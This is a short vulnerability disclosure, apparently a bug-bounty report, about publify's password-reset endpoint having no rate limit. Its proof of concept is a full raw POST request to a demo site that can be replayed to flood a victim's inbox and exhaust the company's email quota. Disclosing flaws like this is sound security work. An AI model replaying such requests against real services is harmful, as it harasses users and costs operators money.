Insufficient Granularity of Access Control in publify/publify
Oct 12th 2021
There is not Rate limit protection bypass sent unlimited email victim who have account email address.
Proof of Concept
There is no rate limit users/password, attacker to send unlimited email who have account victim email address.
POST /users/password Host: demo-publify.herokuapp.com Cookie: _publify_blog_session=bcc4763a5e705ab2f900361126dc1a92 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demo-publify.herokuapp.com/users/password/new Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: https://demo-publify.herokuapp.com Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close utf8=%E2%9C%93&authenticity_token=aMSmWPPXrTwPfgTcEeKEqEKfpcHJiggrpOvwt5b9MyFHfGws3tJQDfbCb9u4nQY98rXHzFnUGwUSVtbxVfLD3A%3D%3D&user%5Bemail%5D=admin%40gmail.com&commit=Send+me+reset+password+instructions
email= parameter value to victim mail. this request unlimited time and victim email address will received unlimited verification email .
Attacker can sent unlimited email to (who have account) any victim mail address . Many email service provider has limited email sending like 1000 email per month . If you exceed that limit then you will be extra charged . So, using this attack attacker can exceed that limit and company will be charged extra money.